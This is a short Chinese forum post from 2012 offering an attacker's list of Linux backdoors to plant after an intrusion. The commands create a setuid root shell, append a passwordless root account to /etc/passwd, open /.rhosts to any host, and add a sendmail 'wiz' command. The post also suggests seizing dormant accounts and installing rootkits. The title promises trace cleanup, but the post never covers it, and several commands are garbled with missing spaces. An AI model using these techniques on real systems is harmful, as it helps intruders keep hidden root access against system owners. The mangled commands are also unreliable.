linux系统从入侵留后门到痕迹清理详解

[复制链接]
查看312 | 回复0 | 2012-4-1 19:17:21 | 显示全部楼层 |阅读模式
1.setuid

#cp/bin/sh/tmp/.sh

#chmodu+s/tmp/.sh

加上suid位到shell上,虽然很简单,但容易被发现
 
2.echo“hack::0:0::/:/bin/csh”>>/etc/passwd

即给系统增加一个id为0(root)的帐号,无口令。

但管理员很快就可以发现哦!
 
3.echo“++”>>/.rhosts

如果这个系统开了512,513的port呵呵,就可以

把一个名为hack加到.rhosts文件中,rlogin登陆,无要密码!
 
4.修改sendmail.cf文件增加一个”wiz”命令;

然后telnetwww.xxx.com25后,wiz。。。。ok
 
5.改已有用户密码
如果主机上有好多用户,当你看到一个用户好久没登入了,就可以改他的密码
#passwd可用passwd命令。
 
6.rootkit后门包
网上有好多地方下载,找找,自己试试看,我也在测试中!不会啊!!!!

*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则